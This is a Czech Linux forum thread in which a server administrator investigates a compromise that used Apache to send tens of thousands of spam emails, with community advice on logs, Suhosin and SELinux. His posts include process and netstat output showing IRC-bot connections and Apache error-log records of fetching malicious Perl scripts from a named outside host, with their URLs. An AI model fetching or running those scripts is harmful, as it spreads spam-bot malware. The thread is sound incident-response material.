abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
Přihlášení | Registrace
×
napište » Zprávičky
inzerujte » Pracovní nabídky
    PipeWire 1.6.0
    dnes 04:44 | Nová verze

    Multimediální server a user space API PipeWire (Wikipedie) poskytující PulseAudio, JACK, ALSA a GStreamer rozhraní byl vydán ve verzi 1.6.0 (Bluesky). Přehled novinek na GitLabu.

    Ladislav Hagara | Komentářů: 0
    Ubuntu Touch 24.04-1.2 a 20.04 OTA-12
    dnes 01:11 | Nová verze

    UBports, nadace a komunita kolem Ubuntu pro telefony a tablety Ubuntu Touch, vydala Ubuntu Touch 24.04-1.2 a 20.04 OTA-12.

    Ladislav Hagara | Komentářů: 0
    AsteroidOS 2.0
    včera 18:00 | Nová verze

    Byla vydána (Mastodon, 𝕏) nová stabilní verze 2.0 otevřeného operačního systému pro chytré hodinky AsteroidOS (Wikipedie). Přehled novinek v oznámení o vydání a na YouTube.

    Ladislav Hagara | Komentářů: 1
    WoWee, klient pro hru World of Warcraft
    včera 16:00 | Zajímavý software

    WoWee je open-source klient pro MMORPG hru World of Warcraft, kompatibilní se základní verzí a rozšířeními The Burning Crusade a Wrath of the Lich King. Klient je napsaný v C++ a využívá vlastní OpenGL renderer, pro provoz vyžaduje modely, grafiku, hudbu, zvuky a další assety z originální kopie hry od Blizzardu. Zdrojový kód je na GitHubu, dostupný pod licencí MIT.

    NUKE GAZA! 🎆 | Komentářů: 6
    EU představila nový nástroj pro posílení bezpečnosti dodavatelských řetězců v ICT - ICT Supply Chain Security Toolbox
    včera 13:33 | IT novinky

    Byl představen ICT Supply Chain Security Toolbox, společný nezávazný rámec EU pro posuzování a snižování kybernetických bezpečnostních rizik v ICT dodavatelských řetězcích. Toolbox identifikuje možné rizikové scénáře ovlivňující ICT dodavatelské řetězce a na jejich podkladě nabízí koordinovaná doporučení k hodnocení a mitigaci rizik. Doporučení se dotýkají mj. podpory multi-vendor strategií a snižování závislostí na vysoce

    … více »
    Ladislav Hagara | Komentářů: 4
    Lze stíhací letoun F-35 'jailbreaknout jako iPhone'?
    včera 12:22 | Humor

    Nizozemský ministr obrany Gijs Tuinman prohlásil, že je možné stíhací letouny F-35 'jailbreaknout stejně jako iPhony', tedy upravit jejich software bez souhlasu USA nebo spolupráce s výrobcem Lockheed Martin. Tento výrok zazněl v rozhovoru na BNR Nieuwsradio, kde Tuinman naznačil, že evropské země by mohly potřebovat větší nezávislost na americké technologii. Jak by bylo jailbreak možné technicky provést pan ministr nijak nespecifikoval, nicméně je známé, že izraelské letectvo ve svých modifikovaných stíhačkách F-35 používá vlastní software.

    NUKE GAZA! 🎆 | Komentářů: 25
    Raspberry Pi Official Magazine 162
    včera 06:00 | Zajímavý článek

    Nové číslo časopisu Raspberry Pi zdarma ke čtení: Raspberry Pi Official Magazine 162 (pdf).

    Ladislav Hagara | Komentářů: 0
    Sdružení CZ.NIC vydalo Domain Report za rok 2025
    včera 05:55 | IT novinky

    Sdružení CZ.NIC, správce české národní domény, zveřejnilo Domain Report za rok 2025 s klíčovými daty o vývoji domény .CZ. Na konci roku 2025 bylo v registru české národní domény celkem 1 515 860 s koncovkou .CZ. Průměrně bylo měsíčně zaregistrováno 16 222 domén, přičemž nejvíce registrací proběhlo v lednu (18 722) a nejméně pak v červnu (14 559). Podíl domén zabezpečených pomocí technologie DNSSEC se po několika letech stagnace výrazně

    … více »
    Ladislav Hagara | Komentářů: 9
    Google Pixel 10a
    18.2. 18:33 | IT novinky

    Google představil telefon Pixel 10a. S funkci Satelitní SOS, která vás spojí se záchrannými složkami i v místech bez signálu Wi-Fi nebo mobilní sítě. Cena telefonu je od 13 290 Kč.

    Ladislav Hagara | Komentářů: 12
    Novinky z vývoje Asahi Linuxu – únor 2026 / Linux 6.19
    18.2. 16:22 | Komunita

    Byl publikován přehled dění a novinek z vývoje Asahi Linuxu, tj. Linuxu pro Apple Silicon. Fedora 43 Asahi Remix s KDE Plasma už funguje na M3. Zatím ale bez GPU akcelerace. Vývojáře lze podpořit na Open Collective a GitHub Sponsors.

    Ladislav Hagara | Komentářů: 0
    Centrum | Napsat | Starší
    navrhněte » Anketa
    Které desktopové prostředí na Linuxu používáte?
     (18%)
     (6%)
     (0%)
     (11%)
     (27%)
     (3%)
     (4%)
     (2%)
     (12%)
     (27%)
    Celkem 913 hlasů
     Komentářů: 25, poslední 3.2. 19:50
    Rozcestník
    AbcLinuxu
    HDmag.cz
    AbcLinuxu:/ Poradna / Linuxová poradna / Kompromitace poštovního serveru
    Štítky: databáze, pomoc, server

    Dotaz: Kompromitace poštovního serveru

    16.1.2010 09:18 kibo | skóre: 17 | blog: Fedora Core 4 | Znojmo
    Kompromitace poštovního serveru
    Přečteno: 591×

    Dobrý den


    v noci mi na email přišlo mnoho (sca 150) emailů od MAILER-DAEMONs. Emaily obsahují standartní správu o tom, že email na XX emailovou adresu nemohl být doručen.

    Jako adresa odesílatele je všude uvedená adresa mého serveru ve tvaru:

    apache@server.mojeDomena.cz

    Moc nevím co mám dělat. Nevím, zda spameři pouze použily emailovu adresu serveru, či zneužily server k odesílání spamu. Jak se to dá zjistit? Je možné, že někdo můj server přidá do nějaké databáze spamových rozesílačů a ostatní poštovní servery nebudou přijímat emaily z naší domény? Jak to zjistit?

    Emaily odesílá Apache? Tedy z nějakého webového rozhranní na nějakém hostujícím webu?

    děkuji za pomoc

    Tomáš

    Nástroje: Začni sledovat (0) ?Zašle upozornění na váš email při vložení nového komentáře.

    Odpovědi

    16.1.2010 09:47 Jakub Suchy | skóre: 22 | Praha
    Rozbalit Rozbalit vše Re: Kompromitace poštovního serveru
    Jelikoz to chodi z apache, asi tam je nekde nejaky web neochraneny proti spam botum, pripadne uz jsem videl utoky kdy uploadli pres FTP skript, kterym pak spamovali.

    Kazdopadne proti prvnimu urcite ochranou Suhosin (nutnost), proti druhemu se mi osvedcilo zakazat base64_decode() v eval pomoci suhosinu

    Samozrejme je treba nejdriv zjistit odkd to prislo presne...
    Drupal
    16.1.2010 10:07 Mti. | skóre: 31 | blog: Mti
    Rozbalit Rozbalit vše Re: Kompromitace poštovního serveru
    E-mailova adresa nic neznamena. Tu muze podvrhnout kdo chce. Dulezite je, z jake adresy (ip) ty zpravy byly skutecne odeslany (byva vetsinou uvedeno ve vracenem mailu). Pokud z Vasi, tak to teprve reste. Pokud z nezname, je to smutne, ze pouzili Vas e-mail, ale neudelate s tim nic.

    V pripade, ze to opravdu je Vas stroj - jestli Vam tam bezi webovy server, muzete projit jeho access log, zda tam neuvidite spousteni neceho, co jste tam nedal.

    To, ze mail nemohl byt dorucen je prilis hruby udaj. Byva tam napsan i podrobnejsi duvod toho nedoruceni. (jako treba schranka neexistuje, je plna...)

    A k te databazi - vetsinou, pokud je duvodem odmitnuti nejaky hatelist, byva primo v mailu s tim odmitnutim napsan i nazev nebo dokonce link. (co uz je ovsem smutnejsi vec, nektere spamlisty nemaji kloudnou cestu jak se nechat vyradit, protoze kontaktni adresy maji zavalene spamem a nikdo je necte ; ale vetsinou to byva automat, s kterym rec je.)
    Vidim harddisk mrzuty, jehoz hlava plotny se dotyka...
    16.1.2010 10:34 kibo | skóre: 17 | blog: Fedora Core 4 | Znojmo
    Rozbalit Rozbalit vše Re: Kompromitace poštovního serveru

    Děkuji za cenné rady.

    Emaily byly odeslány z našeho serveru.

    Logy Ftp a Apache prohledávám.

    16.1.2010 10:57 ikarlos
    Rozbalit Rozbalit vše Re: Kompromitace poštovního serveru
    Zneužití apache k rozesílání pošty by zabránilo defaultní pravidlo selinuxu (httpd_can_sendmail=off).....
    16.1.2010 11:34 kibo | skóre: 17 | blog: Fedora Core 4 | Znojmo
    Rozbalit Rozbalit vše Re: Kompromitace poštovního serveru

    V logu postfixu jsem našel čas odeslání. V Apache ani v Ftp logu v čase odesílání, ale nic mimořádného není.

    Jan 15 21:20:17 scorpio sendmail[26323]: o0FKKHqi026323: from=apache, size=164, class=0, nrcpts=1, msgid=<201001152020.o0FKKHqi026323@scorpio.myDomain.cz>, relay=apache@localhost
Jan 15 21:20:17 scorpio sendmail[26327]: o0FKKHHe026327: from=apache, size=164, class=0, nrcpts=1, msgid=<201001152020.o0FKKHHe026327@scorpio.myDomain.cz>, relay=apache@localhost
Jan 15 21:20:17 scorpio sendmail[26325]: o0FKKHoJ026325: from=apache, size=164, class=0, nrcpts=1, msgid=<201001152020.o0FKKHoJ026325@scorpio.myDomain.cz>, relay=apache@localhost
...
    Jendа avatar 16.1.2010 17:48 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Kompromitace poštovního serveru
    Třeba tam je nějaká děravá PHP aplikace. Co tam běží?
    16.1.2010 18:26 root
    Rozbalit Rozbalit vše Re: Kompromitace poštovního serveru
    a co access_log na ty casy?
    16.1.2010 20:23 kibo | skóre: 17 | blog: Fedora Core 4 | Znojmo
    Rozbalit Rozbalit vše Re: Kompromitace poštovního serveru

    V access_logu Apache, v Ftp logu, v lastlog nic podezřelého není

    Běží mnoho procesů perl

    ps -aux | grep apache 
    apache    7754  0.0  0.0      0     0 ?        Z    11:56   0:00 [perl] defunct
apache    8080  0.0  0.0      0     0 ?        Z    05:40   0:02 [perl] defunct
apache    8173  0.0  0.0      0     0 ?        Z    11:57   0:00 [perl] defunct
apache    8231  0.0  0.0      0     0 ?        Z    16:48   0:00 [perl] defunct
apache    8344  0.0  0.0      0     0 ?        Z    06:20   0:01 [perl] defunct
apache    8486  0.0  0.0      0     0 ?        Z    18:06   0:00 [sh] defunct
apache    8491  0.0  0.1  36064  6604 ?        S    18:06   0:03 perl spamm.txt
apache    8560  0.0  0.1  36060  6604 ?        S    18:06   0:03 perl spamm.txt
apache    8704  0.0  0.1  36064  6604 ?        S    18:06   0:03 perl spamm.txt
apache    8711  0.0  0.1  36064  6608 ?        S    18:06   0:02 perl spamm.txt
apache    8731  0.0  0.0      0     0 ?        Z    16:48   0:00 [perl] defunct
apache    8845  0.0  0.0      0     0 ?        Z    11:58   0:00 [perl] defunct
apache    8847  0.0  0.0      0     0 ?        Z    18:06   0:00 [perl] defunct
apache    8856  0.0  0.0      0     0 ?        Z    18:06   0:00 [perl] defunct
apache    8917  0.0  0.0      0     0 ?        Z    18:06   0:00 [perl] defunct
apache    9035  0.0  0.0      0     0 ?        Z    16:48   0:00 [perl] defunct
...
    netstat -natup | grep perl 
    tcp        0      0 10.10.17.26:46387           201.63.167.164:6667         ESTABLISHED 26994/perl          
tcp        0      0 10.10.17.26:46385           201.63.167.164:6667         ESTABLISHED 26987/perl          
tcp        0      0 10.10.17.26:46389           201.63.167.164:6667         ESTABLISHED 27003/perl          
tcp        0      0 10.10.10.1:52651            10.10.10.1:8009             ESTABLISHED 21346/perl          
tcp        0      0 10.10.10.1:54889            10.10.10.1:8009             ESTABLISHED 21346/perl          
tcp        0      0 10.10.17.26:36716           201.63.167.164:6667         ESTABLISHED 21346/perl          
tcp        0      0 10.10.17.26:36718           201.63.167.164:6667         ESTABLISHED 21351/perl          
tcp     1085      0 10.10.17.26:36703           201.63.167.164:6667         CLOSE_WAIT  21346/perl          
tcp        0      0 10.10.17.26:56797           200.209.9.155:8067          ESTABLISHED 20960/perl          
tcp        0      0 10.10.17.26:56796           200.209.9.155:8067          ESTABLISHED 20953/perl          
tcp        0      0 10.10.17.26:56798           200.209.9.155:8067          ESTABLISHED 20965/perl          
tcp        0      0 10.10.17.26:56801           200.209.9.155:8067          ESTABLISHED 21071/perl          
tcp        0      0 10.10.17.26:56800           200.209.9.155:8067          ESTABLISHED 21033/perl          
tcp        0      0 10.10.17.26:48711           200.209.9.155:8067          ESTABLISHED 8560/perl           
tcp        0      0 10.10.17.26:48709           200.209.9.155:8067          ESTABLISHED 8491/perl           
tcp        0      0 10.10.17.26:48714           200.209.9.155:8067          ESTABLISHED 8704/perl           
tcp        0      0 10.10.17.26:48715           200.209.9.155:8067          ESTABLISHED 8711/perl

    V adresáři /var/named/chroot/proc patří všechny procesy uživately apache.

    16.1.2010 20:30 kibo | skóre: 17 | blog: Fedora Core 4 | Znojmo
    Rozbalit Rozbalit vše Re: Kompromitace poštovního serveru

    Těch odeslaných emalů bylo mnoho tisíc. Kolem 40 tisíc emalů mi bylo vráceno na účet postmaster s hlavičkou Undelivered Mail Returned to Sender

    16.1.2010 21:21 kibo | skóre: 17 | blog: Fedora Core 4 | Znojmo
    Rozbalit Rozbalit vše Re: Kompromitace poštovního serveru

    V error_logu Apache je spousta podobných podivných řádků:

    --20:05:52--  http://ppslaterent.com/brd/v7.gif
Resolving ppslaterent.com... 66.252.228.51
Connecting to ppslaterent.com|66.252.228.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 79079 (77K) [image/gif]
Saving to: `v7.gif'

     0K .......... .......... .......... .......... .......... 64% 32.6K 1s
    50K .......... .......... .......                         100% 29.3K=2.5s

20:05:55 (31.4 KB/s) - `v7.gif' saved [79079/79079]

sh: fetch: command not found
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed

  3 79079    3  2645    0     0   8656      0  0:00:09 --:--:--  0:00:09  8656
 17 79079   17 14229    0     0   8093      0  0:00:09  0:00:01  0:00:08  7977
 30 79079   30 24365    0     0  11946      0  0:00:06  0:00:02  0:00:04 12525
 80 79079   80 63461    0     0  21585      0  0:00:03  0:00:02  0:00:01 23080
100 79079  100 79079    0     0  22309      0  0:00:03  0:00:03 --:--:-- 23598
sh: lnyx: command not found
--20:06:32--  http://ppslaterent.com/nrs/vv.txt
Resolving ppslaterent.com... 66.252.228.51
Connecting to ppslaterent.com|66.252.228.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 33413 (33K) [text/plain]
Saving to: `vv.txt'

     0K .......... .......... .......... ..                   100% 71.1K=0.5s

20:06:33 (71.1 KB/s) - `vv.txt' saved [33413/33413]

syntax error at vv.txt line 29, near "my "
BEGIN not safe after errors--compilation aborted at vv.txt line 58.
sh: fetch: command not found
syntax error at vv.txt line 29, near "my "
BEGIN not safe after errors--compilation aborted at vv.txt line 58.
syntax error at vv.txt line 29, near "my "
BEGIN not safe after errors--compilation aborted at vv.txt line 58.
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed

  3 33413    3  1197    0     0   3928      0  0:00:08 --:--:--  0:00:08  3928
100 33413  100 33413    0     0  43964      0 --:--:-- --:--:-- --:--:-- 70804
sh: lnyx: command not found
syntax error at vv.txt line 29, near "my "
BEGIN not safe after errors--compilation aborted at vv.txt line 58.
--20:06:37--  http://ppslaterent.com/nrs/spamm.txt
Resolving ppslaterent.com... 66.252.228.51
Connecting to ppslaterent.com|66.252.228.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 52470 (51K) [text/plain]
Saving to: `spamm.txt.1'

     0K .......... .......... .......... .......... .......... 97% 41.4K 0s
    50K .                                                     100% 2.42M=1.2s

20:06:38 (42.5 KB/s) - `spamm.txt.1' saved [52470/52470]

sh: fetch: command not found
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed

  4 52470    4  2645    0     0   8639      0  0:00:06 --:--:--  0:00:06  8639
 82 52470   82 43177    0     0  40142      0  0:00:01  0:00:01 --:--:-- 52638
100 52470  100 52470    0     0  48746      0  0:00:01  0:00:01 --:--:-- 64623
sh: lnyx: command not found

    Na URL z výpisu potom podivné scripty.

    http://ppslaterent.com/nrs/spamm.txt http://ppslaterent.com/nrs/vv.txt

    Jak je možné takové scripty přes Apache spustit? Co s tím mám dělat?

    Děkuji za radu.

    16.1.2010 21:38 kibo | skóre: 17 | blog: Fedora Core 4 | Znojmo
    Rozbalit Rozbalit vše Re: Kompromitace poštovního serveru

    Další script v error_log Apache je na url>

    http://ppslaterent.com/brd/v7.gif

    Obsahuje script pokud soubor otevřete jako text.

    cynic_asshole avatar 17.1.2010 03:13 cynic_asshole | skóre: 28
    Rozbalit Rozbalit vše Re: Kompromitace poštovního serveru
    Je to krásnej skript. Chtělo by to znát ty příkazy a pak ten bot prostě vypnout…
    Neznáš nějakou linuxovou distribuci pro Windows?
    17.1.2010 03:42 trekker.dk | skóre: 72
    Rozbalit Rozbalit vše Re: Kompromitace poštovního serveru
    Pod apachem běžící perl... že by to bylo tohle ?
    Quando omni flunkus moritati
    17.1.2010 09:39 kibo | skóre: 17 | blog: Fedora Core 4 | Znojmo
    Rozbalit Rozbalit vše Re: Kompromitace poštovního serveru

    Děkuji za vysvětlení.

    Stále mi není jasné jak se může škodlivý kód do php souboru dostat.

    Přes webový formulář? Jak může útočník něco zapsat do php souboru?

    Jinak všem děkuji za pomoc. Teď už to nějak srovnám.

    Tomáš

    17.1.2010 12:34 trekker.dk | skóre: 72
    Rozbalit Rozbalit vše Re: Kompromitace poštovního serveru
    Stále mi není jasné jak se může škodlivý kód do php souboru dostat.
    Způsobů je spousta a my to samozřejmě nezjistíme (leda že by někdo měl křišťálovou kouli) - to už je tvůj boj, pochybuju, že by se tu našel dobrák, kterej ti bude auditovat webserver.

    Z těch způsobů - může to být prozrazení přihlašovacích údajů k FTP účtu, přes který se dají nahrávat data na web (to už tu padlo), můžeš na tom serveru mít nějaký děravý PHP skript*, který zlejm hochům umožní nahrát svůj vlastní PHP skript na server a následně ho spustit.

    * například nějaký, který umožňuje upload souborů na server, ale nekontroluje přípony; popřípadě takový, který umožní vykonat vzdálený kód, třeba protože jsou špatně ošetřené vstupní parametry.
    Quando omni flunkus moritati

    Založit nové vláknoNahoru

    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    Píšeme jinde
    ISSN 1214-1267   www.czech-server.cz
    Redakce | Inzerce | Podmínky použití | Osobní údaje
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.